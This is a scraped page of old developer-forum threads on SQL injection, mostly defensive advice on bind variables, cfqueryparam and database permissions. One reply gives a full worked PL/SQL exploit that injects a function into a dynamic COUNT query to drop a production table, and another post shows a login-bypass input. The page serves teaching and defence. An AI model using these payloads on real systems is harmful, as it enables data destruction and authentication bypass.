Sql Injection- Security

Similar Messages

• SAP ABAP Secure Coding. Protection against SQL Injection

  Dear community,
  I've detected recently a problem with dynamic SQL queries. It seems to be security relevant. I'll be much appreciated, when you participate at my online survey to this topic at: http://de.surveymonkey.com/s/VC9CBVM It takes less than 1 min time. It is very important to understand, whether it is necessary to protect the coding against SQL injection? Or you can say from your expirience, that it isn't?
  Thanks a lot!
  Moderator Message: if you need a poll support from SCN, then there is an area  http://scn.sap.com/poll-post!input.jspa?container=2015&containerType=14 to create such. Please use it and avoid external links.
  Message was edited by: Kesavadas Thekkillath

  Dear community,
  I've detected recently a problem with dynamic SQL queries. It seems to be security relevant. I'll be much appreciated, when you participate at my online survey to this topic at: http://de.surveymonkey.com/s/VC9CBVM It takes less than 1 min time. It is very important to understand, whether it is necessary to protect the coding against SQL injection? Or you can say from your expirience, that it isn't?
  Thanks a lot!
  Moderator Message: if you need a poll support from SCN, then there is an area  http://scn.sap.com/poll-post!input.jspa?container=2015&containerType=14 to create such. Please use it and avoid external links.
  Message was edited by: Kesavadas Thekkillath

• Lightswitch Security, Protection against SQL Injection attacks etc.

  Hi all,
  I have been hunting around for some kind of documentation that explains how Lightwitch handles typical web application vunerabilities such as SQL injection attacks.
  In the case of injection attacks it is my understanding the generated code will submit data to the database via names parameters to protect against such things but it would be good to have some official account of how Lightswitch handles relevant OWASP
  issues to help provide assurance to businesses that by relying on a framework such as Lightswitch does not introduce security risks.
  Is anyone aware of such documentation? I found this but it barely scratches the surface:
  http://msdn.microsoft.com/en-us/library/gg481776.aspx?cs-save-lang=1&cs-lang=vb#code-snippet-1
  There is this which describes best practices but nothing to say that these practices are adopte within Lightswitch
  http://msdn.microsoft.com/en-us/library/gg481776.aspx?cs-save-lang=1&cs-lang=vb#code-snippet-1
  Thanks for any help, I am amazed that it is so difficult to find?

  LS is a tool built in top of other technologies including Entity Framework.
  Here is a security doc about EF.
  http://msdn.microsoft.com/en-us/library/vstudio/cc716760(v=vs.100).aspx
  LS uses Linq to Entities and therefore is not susceptible to SQL injection.
  HTH,
  Josh
  PS... the only vulnerability that I'm aware of is when a desktop app is deployed as 2-tier instead of 3-tier.  In that case, the web.config which contains connection strings is on the client machine, which is a risk.  Here is a discussion related
  to db security & 2 vs 3-tier.
  https://social.msdn.microsoft.com/Forums/vstudio/en-US/93e035e0-0d2e-4405-a717-5b3207b3ccac/can-sql-server-application-roles-be-used-in-conjunction-with-lightswitch?forum=lightswitch

• Web and Database Security - SQL Inject info

  Web and Database Security - SQL Injection.
  Here is a whitepaper on The Dangers of Dynamic Content (SQL Injection)
  http://www.issadvisor.com/viewtopic.php?t=125
  SQL Injection. 3 parts. The first part discusses the basics of how to test
  web applications for SQL injection vulnerabilities. The second part goes into
  the specifics of how to manually identify and test for SQL injection
  vulnerabilities. And the third part describes how to exploit SQL injection to
  retrieve data from the database.
  http://www.issadvisor.com/viewtopic.php?t=123
  Understanding this critical security issue, helps web developers that leverage
  database must design and make their applications more secure.
  Hopefully these two links are informative and useful. Please pass them on.

  An APEX page can certainly be configured to not require authentication (that's pretty standard for the login/ registration page). There is no need for an "Oracle public password." There are accounts in the Oracle database that APEX uses but that no human needs to know the password for. If that's what you mean by "Oracle public password" then, yes, you do. But that would be the case no matter what authentication and authorization scheme you use in APEX.
  A static IP address for your web server is likely a good idea. It's possible to have DNS work with dynamic IP addresses but that's probably not what you want.
  Justin

• SQL Injection on CallableStatement

  I will try to post this all in one line, as the tags are not working today. I know that one should use PreparedStatement over Statement to obviate the thread of a SQL injection attack. Is CallableStatement vulnerable as well? For reference, this would be running against an Oracle RDBMS. Thanks!
  - Saish

  I guess there is no hard-and-fast rule.Well, I guess the hard and fast rule is "only use
  bound variables". If you've got a sane database
  design then that shouldn't cause you any problems.
  Dave.I agree. I was approaching the issue mainly from a security perspective in locking down a legacy system against SQL injection attacks. Using Eclipse, I was able to zero-in on usages of Statement fairly easily. But the more I looked into CallableStatement, the more I realized that I woud have to inspect each invocation manually. (Just in case someone did not bind variables or built a dynamic SQL string).
  - Saish

• SQL Injection Blocker

  Hello all-
  I've got a server with a huge number of ColdFusion templates
  (over 10,000) which I really need to protect agains SQL Injection.
  I know that CFQUERYPARAM is the best way to do this. I'd love
  to do it that way, but with so many pages, and so many queries it
  would take weeks/months to fix the queries, then test to make sure
  I didn't screw something up.
  So, I've come up with a plan that I wanted to get some input
  on.
  Currently, I have a page on my server that is included in
  almost every page that runs. It is a simple page that I can modify
  to change the status of my systems in the event of a database
  changeover, or some other sort of failure. (The pages still run,
  but no updating is allowed, only reading)
  Okay, so on this page which is always included, I was
  thinking about analyzing the variables that come over. I was
  thinking about looking for things that looked like a SQL injection
  attack and blocking the page from running.
  I wanted to know if this would work- anyone have ideas? This
  would be great because I could protect the entire server in about
  an hour. But, I don't want to give myself a false sense of security
  if this won't really do the job.

  First, here are some simple things you can do to protect all
  pages before you follow the other advice and plans in this thread:
  In CF administrator, click on your datasources and then the
  "Advanced" button.
  There you will uncheck all but the read and stored procedure
  and (possibly) write permissions. "Drop", "Create", etc., are
  definite no-nos here.
  If you haven't already, make one data source read-permissions
  only and refactor your code to use it everywhere except for
  carefully segregated updates, inserts and deletes.
  Now, in SQL Server itself, remove all permissions from the
  users that CF uses except for data_reader and (selectively) data
  writer and exec permissions on any procedures or functions you use.
  In SQL server, setup at least two CF users. One, should have
  only the data_reader permission (plus any read-only stored
  procedures).
  Find articles, such as this one:
  http://www.sqlservercentral.com/columnists/bknight/10securingyoursqlserver.asp,
  and follow their advice, start with locking down xp_cmdshell.
  These measures require little or no CF code changes but will
  block all but the most determined and skilled hackers. You still
  need to follow Adam's advice though.
  BTW, Dan is very wrong, ALL DB's are vulnerable to SQL
  injection.
  SQL server is not even the most vulnerable anymore (Studies
  show that Oracle now has that "honor").

• SQL Injection - cfqueryparam and other techniques to stop abuse?

  We have been having a lot of issues with SQL injection lately and so we are trying various methods to secure the data better.
  First off we have been utlizing cfqueryparam on the queries that are being hit. I am also optimizing the data tables so that more maxlengths are in place.
  What else can be done to improve security? I have looked up everything and anything on the internet and keep seeing the cfqueryparam.
  Does changing the variables or table names make any difference? We are trying that, but I want to make sure it is not a waste of our time.
  Thanks for any other suggestions.

  CFqueryparam is a good fist step, though you should note that it will not protect some queries.  For example if you have a sort by or order by that is dynamic, cfqueryparam wont help in that case.  You will need to review data and validate for that.
  You should also be checking for XSS vulnarabilities.
  http://www.12robots.com/index.cfm/2008/8/4/Persistent-XSS-Attacks-and-countermeausures-in- ColdFusion
  The blog above has a great number of CF sercurity related posts.
  Pete Freitag has a nice security scanner that will look at your CF server and highlight any missing patches and some other issues
  http://www.petefreitag.com/item/721.cfm
  There are some open source projects that will also filter out common sql injection and xss attacks on a code level.
  http://portcullis.riaforge.org/
  Finally there are several conferences in the CF world coming up, and all surely have some security sessions.  You may want to attend.

• SQL injection and SQLFury

  We have recently had an SQL injection attack on our site.  The web form in question was calling a second cfm with a post command.  The second cfm did the actually db insert. After extensive research and revamping of the web form I believed that I had shut it down rather convincingly. I did the following to secure the form:
  - implemented the cfqueryparam tag on all applicable fields being entered in the form
  - introduced a hidden, random numeric variable for verification before completing the insert; it tests for its existence and if it is numeric
  - consolidated the two cfms into one page so the entry and insert are done in one cfm (to eliminate injection going directly thru insert cfm)
  However, I am still getting intermittent injection errors into my MS SQL table.  I don't believe it is getting in through the revised web form and am at a loss as to how it's getting through.
  I am now at the point that I am looking for a utility that will scan through my site or specific pages to identify SQL injection vulnerabilties.  I found something called SQLFury and downloaded it; however, there is literally no documentation with it and I have no idea how to run it.  I've researched the web and found no assistance on how to use this utility.  Is anyone familiar with this utility or does anyone know of any other utility that will assist with validating ColdFusion methods?
  Any assistance would be very much appreciated.

  Ian:
  Thanks for the information.  The utility is helpful and confirmed for me that my page was secure from SQL injection.  The additional insight you provided has lead me to discover that my issue was not an SQL injection, but a Cross Scripting attack.  A web vulnerability utility from Acunetix helped me determine that.
  Thanks again,
  ...Wes

• Sql injection on Oracle

  Good night:
  I'm trying to understand the use of oracleparameters in visual basic .net 2008. It is said that its goal is to avoid sql injection but as far as I know Oracle throws an exception every time you use a ;, so I assume it is not possible to inject malicious sql to oracle.
  Does anybody knows if it's possible and how to do an sqlinjection to Oracle by means of an ado .net command?.
  Thank you

  Section Understanding SQL Injection Attacks in Securing a .NET Application on the Oracle Database:http://www.oracle.com/technology/pub/articles/mastering_dotnet_oracle/cook_masteringdotnet.html shows examples in VB .Net.

• SQL Injection from PL/SQL function.

  WE have some issues with a third party application which has vulnerabilities to SQL Injection, we have delivered a proof of concept to the developers demonstrating that it is possible to return additional (unrestricted) results to the front end, we have also found the following function in the back end. Assuming that its possible to call this function (which it is) and we can pass in whatever we want and that the user has exp_full_database and imp_full_database roles granted is there anything destructive possible with the following function?
  FUNCTION row_count (tab_name VARCHAR2) RETURN INTEGER AS
  rows INTEGER;
  BEGIN
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM ' || tab_name INTO rows;
  RETURN rows;
  END;
  version 11.2.0.3, linux x86

  Simple example.
  SQL> --// table to hack in production - we are going to nuke it
  SQL> create table production_table1(
    2          some_data       number
    3  );
  Table created.
  SQL> --// production code typically executes with production rights (authid definer)
  SQL> create or replace function RowCount( tabName varchar2 ) return integer authid definer is
    2  --// code executes with the privs of the owner of the code
    3          cnt     integer;
    4  begin
    5          execute immediate 'SELECT COUNT(*) FROM ' || tabName into cnt;
    6          return( cnt );
    7  end;
    8  /
  Function created.
  SQL> --// expected use of production code
  SQL> var i number
  SQL> exec :i := RowCount( 'EMP' );
  PL/SQL procedure successfully completed.
  SQL> print i
           I
          14
  SQL>
  SQL> --// create the following in any schema that I, as hacker, have access to and the
  SQL> --// right to create a procedure - and using "access/security escalation", I'm going
  SQL> --// to get production code to run my code with production rights
  SQL>
  SQL> create or replace function InjectCode return integer authid current_user is
    2  --// code executes with the privs of the caller of the code
    3          pragma autonomous_transaction;
    4  begin
    5          execute immediate 'drop table PRODUCTION_TABLE1 purge';
    6          return( 0 );
    7  end;
    8  /
  Function created.
  SQL>
  SQL> --// production table is there
  SQL> select object_type, object_name from user_objects where object_name = 'PRODUCTION_TABLE1';
  OBJECT_TYPE                    OBJECT_NAME
  TABLE                          PRODUCTION_TABLE1
  SQL>
  SQL> --// inject my code into production code
  SQL> exec :i := RowCount( 'EMP where InjectCode() = 0' );
  PL/SQL procedure successfully completed.
  SQL> print :i
           I
          14
  SQL> --// production table is nuked
  SQL> select object_type, object_name from user_objects where object_name = 'PRODUCTION_TABLE1';
  no rows selected
  SQL>

• Sql injection attack - need help changing ASP code

  Our web server was attacked yesterday by SQL injection. So I
  quickly learned about the holes in the code that was generated by
  Dreamweaver MX 2004.
  I found the help article on the Adobe website to fix the ASP
  code; however I need more information for my particular case. I
  don't know how to get my cursor type and location settings into the
  new code.
  MY ORIGINAL CODE
  <%
  Dim Recordset1
  Dim Recordset1_numRows
  Set Recordset1 = Server.CreateObject("ADODB.Recordset")
  Recordset1.ActiveConnection = MM_Oncology_STRING
  Recordset1.Source = "SELECT * FROM dbo.Oncology_Dir WHERE
  Oncology_ID = " + Replace(Recordset1__MMColParam, "'", "''") + ""
  Recordset1.CursorType = 0
  Recordset1.CursorLocation = 3
  Recordset1.LockType = 1
  Recordset1.Open()
  Recordset1_numRows = 0
  %>
  THE NEW CODE, WHICH NEEDS TO BE FIXED TO REFLECT CURSOR TYPE
  AND LOCATION ABOVE.
  <%
  Dim Recordset1
  Dim Recordset1_cmd
  Dim Recordset1_numRows
  Set Recordset1_cmd = Server.CreateObject ("ADODB.Command")
  Recordset1_cmd.ActiveConnection = MM_Oncology_STRING
  Recordset1_cmd.CommandText = "SELECT * FROM dbo.Oncology_Dir
  WHERE Oncology_ID = ?"
  Recordset1_cmd.Prepared = true
  Recordset1_cmd.Parameters.Append
  Recordset1_cmd.CreateParameter("param1", 5, 1, -1,
  Recordset1__MMColParam) ' adDouble
  Set Recordset1 = Recordset1_cmd.Execute
  Recordset1_numRows = 0
  %>
  What exactly is the 5,1,-1 in the code above?
  Any help would be very much appreciated as my ASP page
  (although secured from SQL injection) is not working properly.
  Thanks,
  --Jen
  --Jen

  The new snippet is not vulnerable to SQL injection. It uses a
  command
  object and actual defined parameters, so you're safe. You
  cannot change the
  cursor type or location on that object.
  "jennday" <[email protected]> wrote in
  message
  news:f85omh$ngg$[email protected]..
  > Our web server was attacked yesterday by SQL injection.
  So I quickly
  > learned
  > about the holes in the code that was generated by
  Dreamweaver MX 2004.
  > I found the help article on the Adobe website to fix the
  ASP code; however
  > I
  > need more information for my particular case. I don't
  know how to get my
  > cursor type and location settings into the new code.

• SQL Injection threat with APEX developed applications

  We are using a tool, HP WebInspect, to scan some of our APEX developed applications for web application security testing and assessment. We are getting some critical and high vulnerabilities identified (see below) and would like to know if someone else has encoutered these and to determine a solution, whether it be a setting/settings within APEX or is it more related to the application and the way it was developed.
  Critical:
  Possible SQL Injection
  File Names: • https://xxx.edu:443/pls/apex/f?p=4550:1:36080644498857::NO:4::&success_msg=If+7
  77-777-1911form%40value777.com+exists+in+our+records'+OR%2cwe+will+send+the+workspace+name
  s+associated+with+this+email+address.+If+you+are+having+problems+receiving+the+workspace+name
  s%2cplease+contact+your+administrator.%2fC34A0EF5494AB92C95AA4D0F7BF52332%2f
  • https://busaff-test.utdallas.edu:443/pls/apex/f?p=4550:1:36080644498857::NO:4::&success_msg=If+7
  77-777-1911form%40value777.com+exists+in+our+records%2cwe%2bwill%2bsend%2bthe%2bworkspace
  %2bnames%2bassociated%2bwith%2bthis%2bemail%2baddress.%2bIf%2byou%2bare%2bhaving%2bprob
  lems%2breceiving%2bthe%2bworkspace%2bnames'%2bOR%2cplease+contact+your+administrator.%2fC3
  4A0EF5494AB92C95AA4D0F7BF52332%2f
  High:
  Possible Username or Password Disclosure
  File Names: • https://xxx.edu:443/pls/apex/f?p=104:101:1328157658320206:&notification_msg=Invali
  d%20Login%20Credentials/156F2A38AC41E25732821ABED8AA98B6/
  • https://xxx.edu:443/pls/apex/f?p=104:101:2360963243212364&notification_msg=Invali
  d%20Login%20Credentials/156F2A38AC41E25732821ABED8AA98B6/

  You can help us by telling us your first name, putting it into your profile, and by selecting a friendlier handle.
  The details you showed indicate no SQL injection possibilites whatsoever. The "Critical" examples also are unrelated to Application Express applications that you may have developed (application 4550 is the login application for the product itself and should rarely be used by end users in production environments).
  Scott

• SQL Injection analysis report does not work.

  I have tried to run the SQL Injection report (Home|Utilities|Object Reports Security|QL Injection but it comes up with the following message.
  "SQL Injection analysis is not supported with your current database version. It is only available for Oracle release 10.2 or higher."
  I have tried this as both an ordinary user and as system, on both Windows XP and Linux

  This is a bug in the XE Beta. The SQL Injection Analysis will not be accessible for XE production.
  Joel

• SQL Injection Attacks

  Any Admins aware of possible SQL "injection" attacks like this?
  For example in your web sites login.asp or similar:
  select * from users
  where uname='%value1%'
  and pwd='%value2%'
  where %value1% equals "garbage"
  and %value2% equals "garbage' or TRUE or '"
  select * from users
  where uname='garbage'
  and pwd='garbage' or TRUE or ''
  Useful source of security info:
  http://www.nextgenss.com/news.html
  Get Oracle Security Patches:
  http://otn.oracle.com/deploy/security/alerts.htm
  Adeeva.

  There was an excellent presentation on this and other database attacks at the recent SEOUC conference in Charlotte. You can see the slides by going to http://www.seouc.org. Select "Presentation Abstracts" from the menu and then choose the keynote address. There were a lot of open jaws in the presentation room.
  One technique that we use is to package all SQL used in our websites using bind variables. So the login script you showed would be replaced by a packaged procedure something like this:
  PROCEDURE validate_logon (id_in appusers.id%TYPE, pw_in appusers.password%TYPE)
  RETURN INTEGER
  IS
  x INTEGER;
  sqlstr := 'select count(*) from appusers where id = :1 and password = :2';
  BEGIN
  EXECUTE IMMEDIATE sqlstr INTO x USING id_in, pw_in;
  RETURN x;
  END;
  This would return a positive integer (should always be 1) if the validation succeeds and 0 if it fails. They can't easily inject stuff into this. We used packaged dynamic SQL with bind variables for everything. Also, the account that logs onto the database never has access of any kind to the tables or views, only EXECUTE on the procedures.
  Nothing is foolproof but at least it makes it harder for them.

• SQL Injections and XSS - Escaping Special Characters

  Hi, hope someone can help in regards to security and SQL Injections and XSS.
  We are using APEX 4.0.2 on Oracle 11.2.0.2.
  1. It seems the special characters we have entered into normal 'Text Items' 'Text Areas' etc are not being escaped (ie <,>,&, '). If I enter them into the field (ie Surname) they are saved as is into session state and the database - no escaping. Am I missing something such as an environment setting as I thought the "smart" oracle escaping rules would cater for this.
  Surely I don't have to manually do each of then.
  Just to confirm, am I looking in the correct places to assess if the characters are escaped or not - ie should they show as '&amp;&lt;&gt;' in session state and/or the database ?
  2. Also, for the Oracle procedures such as '‘wwv_flow.accept’ , ‘wwv_flow.show’ , 'wwv_flow_utilities.show_as_popup_calendar' - do these escape special characters. If not, then they must be vulnerable to SQL Injections attacks.
  Thx
  Nigel

  Recx Ltd wrote:
  Just to pitch in, escaping values internally (either in the database or session state) is extremely problematic. Data searches, string comparison, reporting and double escaping are all areas which suffer badly when you do this.
  Stripping characters on input can also cause problems if not considered within the context of the application. Names such as "O'Niel", statistical output such as "n < 300", fields containing deliberate HTML markup can be annoying to debug. In certain situations stripping is totally ineffective and may still lead to cross-site scripting.
  Apex applications that share the database with other applications will also be affected.
  The database should contain 'raw' unfettered data and output should be escaped properly, as Joel said, at render time. Either with Apex attributes or using PLSQL functions such as htf.escape_sc() as and when required.Do not needlessly resurrect old threads. After a couple of months watches expire and the original posters are not alerted to the presence of your follow-up.
  Shameless plug: If you are in the game of needing to produce secure Apex code, you should get in touch.This crosses the line into spam: it violates the OTN Terms of Use&mdash;see 6(j).
  Promotional posts like this are liable to be removed by the moderators.